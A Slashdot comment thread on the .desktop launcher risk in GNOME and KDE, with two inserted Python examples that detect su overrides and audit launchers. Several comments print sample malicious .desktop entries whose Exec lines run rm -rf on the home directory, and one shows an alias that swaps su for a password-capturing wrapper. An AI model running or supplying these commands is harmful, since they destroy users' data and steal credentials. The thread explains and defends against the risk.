Malware Threat To GNOME and KDE
commandlinegamer writes "foobar posted on his blog recently about 'How to write a Linux virus in 5 easy steps,' detailing potential malware infection risks in the .desktop file format used by GNOME and KDE. This is not a new threat, and it appears to still be a risk, as discussions in 2006 did not seem to come to any firm conclusion on how to deal with the problem." There's a followup on LWN.
Solution (Score:5, Funny)
Re:Solution (Score:5, Insightful)
The answer is the same one that has been valid for .. well, since the advent of computers. There will always be vulnerabilities. The best you can do is be aware, vigilant, and choose software that has fewer vulnerabilities and whose writers work hardest to correct the problems fastest. Arguments can be made for or against Linux based on those criteria but it remains a very strong choice over Windows or Apple. The more popular Linux becomes on the desktop, the more chances there will be vulnerabilities. Now is the time for F/OSS coders to start working extra to ensure there are as few as possible.
If you write code, you know that you've left open areas where an exception will cause a problem for any number of reasons. It happens. Period. So far, GNU/Linux has cleaned up quickly and well on most things. The struggle continues. That is the answer.
Re:Solution (Score:4, Informative)
Which in this case is unlikely to be GNOME or KDE, since this attack has been known for several years and absolutely nothing has been done about it (it's "expected behaviour").
Re: (Score:3, Informative)
I tried to make it a choice by the end user as to which is less vulnerable. MS products have/had similar issues by length and criticality. So if any and all of your choices can and will have such vulnerabilities, use other criteria for your choice.
On a side note: Worse than having a vulnerability in the code base for several months or years is having it left there intentionally, and marginally worse is when users ignore the patch when it is provided. With Linux patches are free. With Windows products you ne
Re:Solution (Score:5, Insightful)
With Linux patches are free.
And they are with Windows as well. Come on, it's more than a bit ridiculous to expect Microsoft to supply patches to people who pirate their software. If you've bought your copy of Windows, patches are free. There may be a bug with validating your copy, but that's also a mistake, not by design.
Re:Solution (Score:4, Insightful)
My poorly stated point is that those pirated copies are not being patched appropriately and thus represent a larger target for malicious software authors, making Windows a little bit less desirable from that point of view.
Re: (Score:3, Insightful)
Re:Solution (Score:4, Insightful)
Come on, it's more than a bit ridiculous to expect Microsoft to supply patches to people who pirate their software.
Remember that story about vaccinations the other day? Herd immunity is vitally important, and patching illegitimate installations makes the world safer for legitimate users. This in turn goes a way toward improving Microsoft's security reputation to something greater than Swiss cheese.
Re: (Score:3)
They won't listen (Score:5, Informative)
I filed a bug [freedesktop.org] warning of this security problem in March 2005. Final answer of the developers after taking it to the freedesktop lists: WONTFIX. So, what's the point of reporting bugs?...
The fix is easy, only interpret .desktop files IFF they have the +x bit set (IOW, apply the regular UNIX semantics). It shouldn't take more than a few lines in Gnome and KDE to fix it, and distros can easily modify the scripts to make all the .desktop files +x-
Re: (Score:3, Insightful)
Well that's not actually a fix. If you're getting the file there by social engineering you can quite easily get the user to set permissions on the file to allow execution (you've already convinced them to download it, haven't you).
If you've found a vulnerability allowing you to put the file there without user intervention, then you can easily change the permissions at the same time.
Re: (Score:3, Insightful)
The only solution to social engineering of the user is to have a more knowledgeable system administrator. This just ups the ante on the social engineering.
No system can defeat social engineering.
Re: (Score:3, Funny)
Well... file a God-bug [xkcd.com]. That should fix it!
Re:Solution (Score:4, Informative)
The vulnerability is in the way the desktop environment hides information from the user so you have no way (even if you are an experienced and responsible user) to avoid executing the malware. You get an attachment by mail, you just save it to look at it and see what it is (a one-click, and expected-safe operation) but when it appears on the desktop background, it's disguised as something else (the .desktop file can choose any icon and name it wants), and double-clicking to view the file in fact *executes* the code without asking you.
What should happen: you save the file; if you chose to save it to the desktop background it appears there, but because it's not marked executable it will not run when you double-click it. Instead the file contents open in a text editor, or some other fairly boring but safe action.
Re: (Score:3, Funny)
> see what it is (a one-click, and expected-safe operation)
You do *WHAT*?
> but when it appears on the desktop background
Wait, not only do you deliberately save random unidentified email attachments, you save them to the DESKTOP?
Whatever is wrong with you, it's no little thing.
> What should happen:
What should happen, when you get an email attachment and you do not know what it is, is that you either ignore it, or if you have a cer
Re:Solution (Score:5, Insightful)
Have a brain when using the PC.
It works for all operating systems. Viruses and Trojans require the user to not think and execute things willy-nilly. Having a brain reduces the infection vectors drastically.
Every "expert" I have met that has been infected was downloading and using warez unsafely. Every regular user I have met that was infected simply clicked yes to every dialog box they did not want to bother reading and understanding.
The OS does not matter, having educated and competent users does. Have to add that competent, I have seen educated users go and click on crap without reading or thinking.. It requires competence.
Re: (Score:3, Insightful)
Having a brain reduces the infection vectors drastically.
I forgot sarcasm tags when starting this thread, but there's also many other problems outside of "not having a brain." Unpatched flaws in your operating system, people still running IE6 and opening a JPEG with a script embedded, etc. One can be very intelligent at something completely unrelated to computers and still get infected purely because of a popup and an unpatched system.
Not everybody knows to run windows update or to update their Ubuntu installation even if it warns them, because it's usually being
Not PEBKAC (Score:5, Interesting)
A lot of people claim it's a PEBKAC problem, but I STRONGLY disagree.
If you expect people to figure out whether a file is safe before "launching/opening" it, then you are expecting people to solve something arguably harder than the "halting problem" (which I hear is very hard, but still easier in comparison since you are given both the description of the program AND the finite input!).
I propose that:
1) Compliant programs be allowed to _request_ what they want to be able to do (by either using a finite and manageable set of standard sandbox templates, or in special cases a custom sandbox template - which can be audited and digitally signed by 3rd parties).
AND THEN
2a) The user be asked whether the request seems reasonable e.g. Fun Screensaver requests "Standard Screen Saver" privileges vs WARNING!! Fun Screensaver is requesting "Full System" privileges!
AND THEN
3) If approved, the operating system then enforces the requested template, so the program can only do whatever possible within the template sandbox.
Do note there's also:
2b) The request is silently approved if the OS has been told to remember the user's prior approval of the program and template (and the alt/whatever key was not held down while launching).
2c) The request is silently approved if the program and requested template is signed by trusted parties (e.g. OS vendor), and the alt/whatever key was not held down while launching.
I have proposed this concept before to Ubuntu and Suse, see:
https://bugs.launchpad.net/ubuntu/+bug/156693 [launchpad.net]
(FWIW I've actually also suggested this to apple).
It'll be hard to implement, but I suspect it's easier than getting "Joe Sixpack" to reliably solve something harder than the "halting problem".
Lastly, much Windows malware REQUIRES a brain to participate in order to spread. It's often harder to write malware that does not require a brain to spread. Many here think they're so smart, but would they really know what a devious binary or perl script actually does? Have they ever looked at the Underhanded C entries?
Re: (Score:3, Insightful)
Does it provide the user with an accurate concise idea of what the program's required privileges are?
Does it allow the user to save the decision preferences for an app+template pair?
Vista's UAC as implemented seems more like a way for Microsoft to shift blame to the user for security problems.
Re: (Score:3, Insightful)
Actually it's not what Vista does. Vista says "application X is either requesting system access, or appears as if it might request system access do you want to grant it".
It doesn't allow you to define which types of system access you want it to have (I might want my screensaver installer to be able to access the settings which allow it to set the screensaver I just installed as my default screensaver, but not to arbitrarily execute code or access other system settings for instance), nor does it allow you to
Re:Solution (Score:5, Insightful)
This has very little to do with user stupidity. Indeed, users should not execute things willy-nilly, but it's surely okay to open a file and look at its contents? If you think that is inherently unsafe then users must be prohibited from receiving email attachments (or downloading from web pages) altogether.
In this case there are no warning dialogues to click through, no unusual steps. All that happens is you save a file and then double-click to open it. There is no way to see in advance that the file is unsafe, and it can adopt any icon and name it wishes, so in the user interface it is *indistinguishable* from a legitimate desktop icon such as the trash can.
It gets a laugh on Slashdot to castigate 'stupid' users, but if the system does not provide users with the information needed to make an informed choice, then the system is at fault.
You are wrong (Score:5, Insightful)
I am dealing with a user at the moment who just isn't that bright. It is not that she is a moron, she just doesn't think. Some things she does right, she gets her wallpapers through Google's image search and uses firefox after my suggestion.
But she also wants animated cursors and finds them and happily installs them. Cursor Mania.
She just doesn't get, yet, that the internet has two kinds of free and that the more something shouts it is free the less likely it is. How do you explain that firefox is free and safe but cursormania is free and not safe?
The problem is not so much that some people are stupid but that they lack a healthy dose of cynicism, they forget to question things. And that is pretty to stupid.
The system can't protect against this unless you want to live in the nanny state. Women are free to go with convicted wife-beaters unless you want the state to decide your partner for you. People can install spyware unless you want the system to decide what you can install.
For some reason people like you want software to do things you would NEVER accept in hardware. Would you really want a power drill that constantly checked whether you were drilling in the factory approved substances, at the right angle, under the right conditions? A screwdriver that refuses to be used as a hammer?
At some point users must accept a responsibility to operate their equipment responsibly themselves and accept that if they make mistakes, they are the ones to blame.
You know what my solution has been to fix 99% of friends requests to fix their windows PC? Re-install. Wipe the crap and sooner or later they either figure out that "mmm once I downloaded those free smileys my computer starts to act like a piece of crap, maybe these two things are connected" or at least find someone else to help with their crap PCs.
Let's face it, after 30 years I have started to realise that no amount of suggestion is ever going to result in girls actually giving any of the sexual favors they seem to promise when they ask you to fix their laptop.
Re:You are wrong (Score:5, Insightful)
What you say is all true but it's not relevant to this particular problem, which is that *all* users, even sensible and cautious ones, can be easily tricked into running an executable because the user interface makes it look exactly like an ordinary file. You or I would also be vulnerable.
And BTW, I suggest you kiss her first, and fix the laptop afterwards.
Re:You are wrong (Score:4, Funny)
Let's face it, after 30 years I have started to realise that no amount of suggestion is ever going to result in girls actually giving any of the sexual favors they seem to promise when they ask you to fix their laptop.
It seems to me that while they are a bit slow with technology you, on the other hand, are a bit slow at making the (lack of) connection between "fixing laptop" and "getting laid" when social interaction is the issue.
Re: (Score:2)
But she also wants animated cursors and finds them and happily installs them. Cursor Mania.
She just doesn't get, yet, that the internet has two kinds of free and that the more something shouts it is free the less likely it is. How do you explain that firefox is free and safe but cursormania is free and not safe?
I had exactly one of these sort of people needing to borrow my (linux) computer the other day. A couple hours later I get back and on the desktop there's a couple extra files on my desktop like wallpapers.exe and the like. I really couldn't help but chuckle. I guess security through obscurity works for stupid users. :P
The problem is not so much that some people are stupid but that they lack a healthy dose of cynicism, they forget to question things. And that is pretty to stupid.
Eh. I've had enough of these cynic people. Such as "This software isn't free. I might not be into the whole computer scene, but trust me on this one, there's going to be a catch. The only thi
Re:You are wrong (Score:4, Insightful)
I think I would try that by explaining the difference between free as in freedom [gnu.org] and free as in "we will sell your soul to our advertisers" [google.com].
Re: (Score:2)
Re: (Score:2)
Finally, year of the openbsd desktop!
OpenBSD (Score:4, Funny)
Re: (Score:3, Funny)
Frost piss (Score:4, Interesting)
Interesting article. Cliff notes for those who don't read articles: KDE & Gnome desktop icons can contain malicious commands.
The common defense that "well at least linux malware can't get root privileges" isn't much of a defense. For many users, the most sensitive documents they have are owned by themselves.
Linux Users Don't Backup?!? (Score:2)
You mean Linux users, besides Linus (we all mirror his important files for him), should be backing up their files!?!
Oh the horror!
Re:Linux Users Don't Backup?!? (Score:4, Insightful)
Don't be so shortsighted. The issue isn't you losing your files. It is that others can obtain your files.
Just because malware doesn't have root privileges doesn't mean it isn't capable of stealing valuable information from you.
Re:Linux Users Don't Backup?!? (Score:4, Interesting)
Just because malware doesn't have root privileges doesn't mean it isn't capable of stealing valuable information from you.
I sometimes wonder how difficult it would be to obtain the root password from somebody. If the PATH variable has a path that the user has write access to, what's stopping the malware to put a "su" wrapper into that directory? Next time you enter su, the wrapper captures your password, logs you in and deletes itself.
I also think that a keylogger for X11 wouldn't be too difficult to implement.
Re: (Score:2)
If the PATH variable has a path that the user has write access to,
then the machine admin (or distro creator) is a moron.
Re: (Score:3, Informative)
On second thought, you don't even need that. The malware just has to do
echo "alias su=/tmp/evilwrapperscript" >> ~/.bashrc
and you're finished
Re: (Score:3, Informative)
True. Though just as the first case can be prevented by mounting /home (or possibly /home/) noexec, this one can be prevented by doing same with /tmp
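A detection-side check for the two tricks discussed in the comments above (an alias or shell function that redefines su, and a user-writable directory searched in PATH before the real su), as an added example that is not part of any post. The function names, the rc sample and the directory names are constructed for illustration; only the alias line is taken from the thread.

```python
import os
import re

TARGETS = ("su", "sudo")  # commands whose redefinition is worth flagging

ALIAS_RE = re.compile(r"^\s*alias\s+(?:--\s+)?([\w.-]+)=(.+)$")
FUNC_RE = re.compile(r"^\s*(?:function\s+([\w.-]+)|([\w.-]+)\s*\(\s*\))")


def scan_rc(text, targets=TARGETS):
    """Return (line_no, kind, name, line) for each alias or shell function
    in a shell rc file that redefines one of the target commands."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        m = ALIAS_RE.match(line)
        if m:
            if m.group(1) in targets:
                findings.append((no, "alias", m.group(1), line.strip()))
            continue
        m = FUNC_RE.match(line)
        if m:
            name = m.group(1) or m.group(2)
            if name in targets:
                findings.append((no, "function", name, line.strip()))
    return findings


def shadowing_dirs(path_value, target="su",
                   is_writable=lambda d: os.access(d, os.W_OK),
                   has_target=lambda d, t: os.path.isfile(os.path.join(d, t))):
    """Return PATH entries the current user can write to that are searched
    before the first non-writable directory that really contains target.
    A file dropped in any of them would be found first."""
    risky = []
    for entry in path_value.split(":"):
        d = entry or "."  # an empty PATH entry means the current directory
        if is_writable(d):
            risky.append(d)
            continue
        if has_target(d, target):
            break  # the real binary is found here; later entries cannot shadow it
    return risky


# Constructed sample of a ~/.bashrc after the one-liner from the thread has run.
SAMPLE_RC = "\n".join([
    "# ~/.bashrc (constructed sample)",
    "alias ls='ls --color=auto'",
    'export PATH="$HOME/bin:$PATH"',
    "alias su=/tmp/evilwrapperscript",
    'sudo() { /tmp/x "$@"; }',
])

if __name__ == "__main__":
    for finding in scan_rc(SAMPLE_RC):
        print("rc override:", finding)
    rc = os.path.expanduser("~/.bashrc")
    if os.path.isfile(rc):
        with open(rc, encoding="utf-8", errors="replace") as fh:
            for finding in scan_rc(fh.read()):
                print(rc, finding)
    print("writable before su:", shadowing_dirs(os.environ.get("PATH", "")))
```

Run as root the PATH check reports every directory as writable, so it is only meaningful from the ordinary user account being audited.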
Re: (Score:2)
The other issue is that your computer can be turned into one of those "zombies", just like the thousands of windows machines out there.
Desktop Linux is just as vulnerable as Windows. The security model is similar if not less secure - by default any program that > 90% of the Linux users out there run, can do whatever that user's account can do.
Given the same sort of users, the same sort of marketshare, there'd be tons of trojans, rootkits, zombies everywhere. If not more s
Re:Frost piss (Score:5, Insightful)
It does make a big difference in clean-up, though. With the malware not being able to get administrative privileges, it can't get into root's environment. That means that you can log in as root and the malware won't get a chance to take over, and then you can safely use all your scanning and clean-up tools without having the malware disable or circumvent them. Contrast this with how thoroughly rootkits can hide on Windows systems.
It's still dangerous, make no mistake. Once the malware's running locally, it can try local exploits to escalate to root access. But there's a lot fewer of those on Linux systems than on Windows, and they're a lot harder to exploit, and anything that doesn't successfully exploit them will be much easier to detect and remove. This is a significant win compared to Windows.
NB: nothing will protect a system from its owner's stupidity. If the user insists on being willfully stupid, they're in a position to bypass any and all protections on the system. The only protection is to keep them away from the keyboard.
Re: (Score:2)
Why I'm still worried by a malware that, even without root privileges, runs
cd /
rm -rf *
Re: (Score:3, Insightful)
Really though, especially if we're talking about my personal desktop or laptop
Re: (Score:3, Informative)
I advocate the "Don't run as root." position for two reasons. One, it builds good habits from the start, both for users and for software vendors. It gets users used to running as ordinary users, and conditions them to expect the system to function correctly without administrative privileges except when explicitly doing administrative tasks. We've seen on Windows how many problems keep sticking around simply because of habits users have developed over the years. Inertia works, so put it to good use instead o
Re: (Score:2)
You have a very narrow view of the advantages of not running root. Let's say you get infected by a well written rootkit/stealthy trojan that quietly sends data from your computer to the crooks. Your keyboard is logged, email is scanned and who knows what else is transmitted. But since it didn't touch your downloads or music is no problem right? Not being root prevents most of dangerous malware from instantly hijacking your PC. It's far from being the silver bullet security solution but it's a must, unless y
Re: (Score:3, Interesting)
Escaping notice is the most important part of keeping malware on system. After it's found, the question is more about how painful it is to get off the system than whether it's going to get removed. Since modern malware authors want their software to stick around in the background for as long as possible, they just avoid doing anything outrageous and let the zombie send out a trickle of emails.
Experience with Windows users shows that the average end user who's willing to click on something like the author wa
Not really news... (Score:2)
The "Look! nude pictures of [latest chick seen on a hollywood blockbuster] ! If it doesn't open, save and execute" routine is pretty cross-platform. It relies on the Stupidity 0.99995b RC12 Gold API, and it is here to stay.
Re: (Score:3, Insightful)
The first problem is indeed that a desktop file does not require the executable bit to be executed (from Nautilus) by double-clicking it.
The second problem is that the file content specifies its icon, name and tooltip regardless of the filename of the desktop file.
For example, a very efficient way to fool people could be to disguise the desktop file into one of the default icons of the desktop (Trash, Computer, Home, ...)
For the virus writer the only problem is to get the desktop file to be saved in the Desk
Re: (Score:2)
I'd say it's not so much stupidity than human psychology, and that most people aren't educated to recognize these dangers. I'll refer you to what security and user interface designers refer to as the Dancing Bunnies [msdn.com] problem.
The main workaround is to have users work in a sandbox. That way, if they blow something up, it's just their sandbox. The sandbox could be their home directory, or a virtual machine. Windows historically didn't sand
Re: (Score:3, Interesting)
The "Look! nude pictures of [latest chick seen on a hollywood blockbuster] ! If it doesn't open, save and execute" routine is pretty cross-platform. It relies on the Stupidity 0.99995b RC12 Gold API, and it is here to stay.
Which is wrong and has always been wrong by the way. And it's not "open, save, and double click" not "open, save and execute".
When someone double clicks an icon that signifies it's an image file, that action should not execute an arbitrary command on your system. There needs to be some sort of guarantee that the icon chosen to represent a file actually represents the file. There is no guarantee with .desktop files. This is a bug damn it, not a feature!
And you have a strange definition of "stupidity" whi
Virus? (Score:5, Insightful)
It relies on the user downloading saving and running a shell-script. The only trick here is that in this KDE/GNOME form the user does not need explicitly to add execution rights on the file.
Still hardly a virus, more like a gun without a safety switch. It is one step easier for someone to shoot themselves this way.
Interestingly if we wish to reinforce the 'chmod +x' scheme, desktop files should need a +x (or some other non-MIME property) to be treated specially by GNOME and KDE. Might be an idea.
Re: (Score:2)
It depends on the user clicking to 'save attachment'. The attachment is not in fact a shell script but a .desktop file. If it goes to the desktop background (as is often the default when saving files) then it can choose any icon it wishes, disguising itself as a plain text file or a JPEG image or even another copy of the 'Computer' icon that launches the file browser.
Re: (Score:2)
The only trick here is that in this KDE/GNOME form the user does not need explicitly to add execution rights on the file.
Not quite; this "shell script" (desktop file) also has the ability to arbitrarily override its displayed icon and label. One possible scenario:
Requiring the executable bit for .desktop laun
Re: (Score:2)
Re: (Score:3, Insightful)
I care more about user data.
I can get "install" data from the DVD/CD and Distro update service.
But I cannot always retrieve the most recent user data from backups.
Losing a day's work or even an hour's work can be more pain than having to reinstall the OS.
Of course it's different if you are one of those users that installs an operating system just for the purpose of playing with themes, etc but not doing any significa
Great news (Score:5, Funny)
So we have a long-known, unaddressed vulnerability and easily accessible instructions on writing a Linux virus.
Does this mean Linux is finally "ready for the desktop"?
Re:Great news (Score:5, Funny)
No, it means malware is finally ready for the .desktop
Re: (Score:3, Insightful)
I get your humor, but this may be the only way for Linux to claim the "year of Linux on the desktop".
I mean bug-to-bug, bullshit-to-bullshit compliance to MS Windows. People are fed crap to grow up and they ask for more crap. At least this is what I think I got from GNOME.
I used to have a sig. saying "so this is how Linux dies -- with thunderous applause." I changed it after being protested by someone as AC (and partly in fear of being sued by LucasFilm ;) I've always feared that the year of Linux on the de
Re: (Score:2)
I have a test case running right now. A 60-odd year old gentleman, with close to zero computer experience, was given a 3 or 4 year old PC and wanted to use it. Win2000 was installed and password protected. I wiped the disk, installed Ubuntu and gave the machine back without saying too much about MS, Linux or what-have-you. It'll be interesting to see how he makes out.
I will say that the Ubuntu install was totally painless - it recognized and correctly configured all the hardware without an internet conne
Re: (Score:3, Funny)
You really shouldn't call your dad a "test case."
Today's file managers are going wild... (Score:2, Insightful)
Everyone is trying to mimic the brain-dead M$ Way.
Just think of the idea. You click on the icon (who knows what the picture would suggest) and the file path is passed to an "interpreter" (be it oowriter, emacs or python or ld.so) you may not know. This is a terrible idea to begin with.
That's why I use file managers almost only for bulk copying / moving. And I still prefer the CLI if the file names are regular-ish enough.
Re: (Score:2)
Re: (Score:2)
Well, independently of whether you could code it or not: what design choices would you make which are so different from what there currently exists? If you think it is bad that the existing file managers are so similar it probably means you have considered ways in which they could be different...
It's not like the design space for file managers is that huge, you know...
Lame (Score:3, Insightful)
I have previews turned on in Gnome so I can actually see the picture before I run the code.
Re: (Score:2)
The whole scheme hinges on the user being an idiot in terms of what they open in their email - seems to me there's little in the way of guarding against such 'vulnerabilities'...build a more idiot-proof system and the world will build a bigger idiot.
from the article (Score:2)
Type=Application
Name=some_text.odt
Exec=rm -rf $HOME
Icon=/usr/share/icons/hicolor/48x48/apps/ooo-writer.png
Oops... you had backups of all your data, didn't you?
The article has an example of an entry that downloads code off a server and executes it instead.
Fast fix (Score:5, Interesting)
Fast, simple fix for this: make .desktop files scripts. Start them with "#!/usr/bin/false" or something so that if just executed from the command line they don't do anything, just fail. Gnome and KDE expect all entries to start with that and be executable. If they're executable, they act normally. If they aren't executable, the contents or their properties are displayed instead. If they don't start with the hash-bang line, the interface prompts the user for whether they want to display or execute the entry.
A fancy elaboration could register a binary-format handler (similar to the one Wine registers) that would recognize the "[Desktop Entry]" starting the file as a binary format and, if the file was executable, trigger the interface to act on the entry. That could remove the need for the hash-bang first line, but there's some other potential holes I'd have to analyze for impact.
Re:Fast fix (Score:5, Interesting)
Why not just make a proper interpreter for .desktop files, and use that in the first line ("#!/usr/bin/desktop-launcher")? Then the DEs could always run executable files, and always display non-executable files. As a bonus, you could run launchers from the command-line.
Re: (Score:2)
Because you want them to be do-nothing files when you aren't running in a DE (eg. logging in from a text-mode console or via SSH). Or at least that's MHO.
Not a virus? (Score:5, Insightful)
When I think of a "virus", well, that's just malicious code, it's something designed to do some form of damage. It's malware-- software that's up to no good. That doesn't describe the delivery method.
I can see how folks want to draw a distinction based on the severity of the exploit (namely the extent of the potential damage to the system and the level of user interaction), but claiming this isn't a real virus is just silly. Maybe a new definition for the more severe sorts of malware is needed.
Re: (Score:2)
Then they likely aren't viruses, but other things such as worms.
This wouldn't be that hard to fix... (Score:2)
1. Create some way to register
2. White list all
Security of OS files vs personal files (Score:2)
Re: (Score:2)
In non-root mode, ANY program can access my personal files, email them, upload them, delete them, mutilate them, etc...
Not true. Only programs run as your user can access your personal files, assuming you have sane permissions set.
But if the repositories would be hacked, then even that source isn't safe!
That's what package signatures are for.
Dumb question related to OS X (Score:2)
Could the respective desktops be set up to prompt the user before a .desktop entry is opened for the first time, a la OS X's behavior when launching apps?
Re: (Score:2)
I realize that you are only 19 years old and new to this Internet thing. Posting link spam like you have been doing is considered bad etiquette.
Please stop, we do not like it here.
Re: (Score:2)
I guess my hopes of starting a new meme have been dashed...alas.
I think I speak for us all when I say that there's enough memes and we don't need you trolling /. trying to make a new trend while plugging a blog.
Re: (Score:3, Funny)
Nah, you don't speak for me.
Re:Protect your self with encryption (Score:5, Informative)
Why do shortcuts need to have the ability to run code?
The shortcut only contains parameters for the path to the application and a list of parameters; it doesn't run any code itself. The problem is that the application can be (e.g.) /usr/bin/perl, and the parameters "-e 'perl code here'". Removing this ability would seriously impact the usefulness of the shortcuts.
The real issue is that the DEs are blindly trusting a non-executable file of unknown source to provide this information. The solution has already been suggested: turn all .desktop files into scripts (via a #! line, which is already valid comment syntax), mark them as executable, and have the DE run them like any other executable file. Non-executable .desktop files which link to applications would be displayed as usual, but would be treated as documents rather than launchers.
Re: (Score:2)
Re: (Score:3, Insightful)
That would require a blacklist of script interpreters, which could only be a temporary solution. No blacklist is ever going to cover all possible attack vectors. Similarly, checking for particular parameter length will either have too many false positives or fail to catch potential attacks. E.g., what if the command was /bin/rm and the parameters were "-rf /"?
Requiring the executable bit would make for a more permanent solution to the problem.
Re: (Score:2)
Re:Protect your self with encryption (Score:5, Informative)
Yeah it's pretty straightforward: if the executable bit is not set then the file is merely *displayed* as a plain text file. If the executable bit is set then it is *run*.
That means you cannot simply save an attachment from a message and run it. You can however display it, which is fine.
Everything works like this except for .desktop files, which because of an oversight, default to *running* on double-click even if not marked executable. Hence the attack vector. It is made nastier by the fact that .desktop files can disguise themselves with a name and icon of their choosing.
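The policy proposed in the "Fast fix" comment and restated just above (launch only when the execute bit is set, display otherwise, prompt when the #! line is missing), written out as an audit routine. This is an added example, not code from GNOME, KDE or any poster; the function names, sample file names and the harmless Exec=/bin/true lines are constructed, and the order in which the three rules are applied is one reading of that comment.

```python
import os
import stat
import tempfile

# Extensions that make a launcher's displayed Name read like a document.
DOC_EXTS = (".odt", ".doc", ".pdf", ".txt", ".jpg", ".jpeg", ".png")
ANY_EXEC = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH


def parse_desktop_entry(text):
    """Return key/value pairs from the [Desktop Entry] group only."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):  # a "#!" first line is a comment too
            continue
        if line.startswith("[") and line.endswith("]"):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, value = line.split("=", 1)
            entry.setdefault(key.strip(), value.strip())
    return entry


def classify(path):
    """Return (action, warnings) for a double-click on path.
    action is 'display', 'launch' or 'prompt'; the Exec line is never run."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    entry = parse_desktop_entry(text)
    executable = bool(os.stat(path).st_mode & ANY_EXEC)

    if not executable:
        action = "display"   # regular UNIX semantics: no +x, show the text
    elif text.startswith("#!"):
        action = "launch"    # marked executable and carries the script header
    else:
        action = "prompt"    # executable but old format: ask the user first

    warnings = []
    name = entry.get("Name", "")
    if entry.get("Type") == "Application" and name.lower().endswith(DOC_EXTS):
        warnings.append("launcher Name looks like a document: " + name)
    if "Exec" in entry and not executable:
        warnings.append("has Exec= but no +x bit: treat as untrusted text")
    return action, warnings


def demo():
    """Classify three constructed files in a temporary directory."""
    disguised = ("[Desktop Entry]\nType=Application\nName=some_text.odt\n"
                 "Exec=/bin/true\nIcon=ooo-writer\n")
    plain = "[Desktop Entry]\nType=Application\nName=Terminal\nExec=/bin/true\n"
    samples = [
        ("saved_attachment.desktop", disguised, 0o644),
        ("installed.desktop", "#!/usr/bin/false\n" + plain, 0o755),
        ("legacy.desktop", plain, 0o755),
    ]
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        for fname, body, mode in samples:
            path = os.path.join(tmp, fname)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
            os.chmod(path, mode)
            results[fname] = classify(path)
    return results


if __name__ == "__main__":
    for fname, (action, warnings) in demo().items():
        print(fname, "->", action, warnings)
```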
Re: (Score:2)
Re: (Score:3, Interesting)
The programs responsible for creating .desktop files would set the execute bit automatically, so the change should be more or less invisible. The only case where you'd have a non-executable .desktop file would be if it was saved from a program which does not normally create shortcuts: an e-mail attachment, something downloaded from a web site, etc.
Re:Does not work as advertised (Score:4, Insightful)
Did you even RTFA? (Score:5, Informative)
He is not talking about shell scripts at all. The whole point of the article is a .desktop file does not need to be +x to execute it, KDE and Gnome execute commands in it automatically regardless. So all they have to do is save it and click on it.
Re:Did you even RTFA? (Score:5, Insightful)
Re:Did you even RTFA? (Score:5, Funny)
You are right and I am wrong.
W...w...wh....what the fuck just happened?! Am I on the internet still?
Re: (Score:2)
Is there a "reason" for that? I mean a real technical reason of course. What would be the damage if the DE obeyed the +x bit for these?
Re:Stay away from root (Score:5, Insightful)
Re: (Score:2)
Which you have backed up, RIGHT?
Re: (Score:2, Insightful)
Re: (Score:2)
You can lose your data by
A bad drive
Accident (Delete, whoops... )
Your system becoming unusable
Malware deleting files
This is what backups are for .... if your system is still running and free from malware (now) you can just restore the backup, in a few moments
If the malware runs as root then it's a case of reinstall from the ground up then restore all of the the backup ...(Windows default)
Re: (Score:2)
And moral of the story is:
Only use root when you have to, and never, EVER log into a desktop as root. If you do this, and there's no problem in doing it in Linux, the vulnerability can't hack your box, it can only hack your account.
The loss can only be to your data, which is typically unique and valuable, as opposed to your operating system, which is easily replaced, you mean?
Wow, that's just great. Can we have an OS with proper sandboxing already? Anything you run in its own container, unable to escape? So you really _can_ run programs from the internet, without any fear of the consequences?
Re: (Score:2)
We linux gamers already do exactly that.
Gnome, KDE, and other environments take up too much resources, so we start a Xterm. Then we proceed to launch the game via Wine.
Games run smoother in Linux via Wine than they do on the same hardware with Windows.
Wow, please mod this to -1 (Score:4, Funny)
Sorry, wrong thread, too many tabs.
Re: (Score:2)
Why would the judge get kickbacks for jailing juveniles (or others)?
Maybe the judge knew that they were all writing Linux viruses.
Maybe I just haven't had enough coffee...
Obviously. You posted to the wrong story. With any luck someone else will also be caffeine deprived and will mod you as Insightful anyway.
Re: (Score:2)
paste the above four lines into a text file named screensaver.desktop and execute it while in gnome or KDE, DANGER this can delete everything in your
Re: (Score:2)
I like the idea of ransomware.
'Pretty game runs'. While playing, it downloads say 10 pubkeys from GPG server. Then proceeds to encrypt ~ to those 10 keys whilst overwriting every file there.
Now, game shows nasty message: Your shit has been encrypted. Pay X or fcuk off.
Re: (Score:2)
[Desktop Entry]
Type=Application
Name=Cool_Screensaver
Exec=rm -r ~/*
fixed it, DO NOT DO THIS!
Re: (Score:2)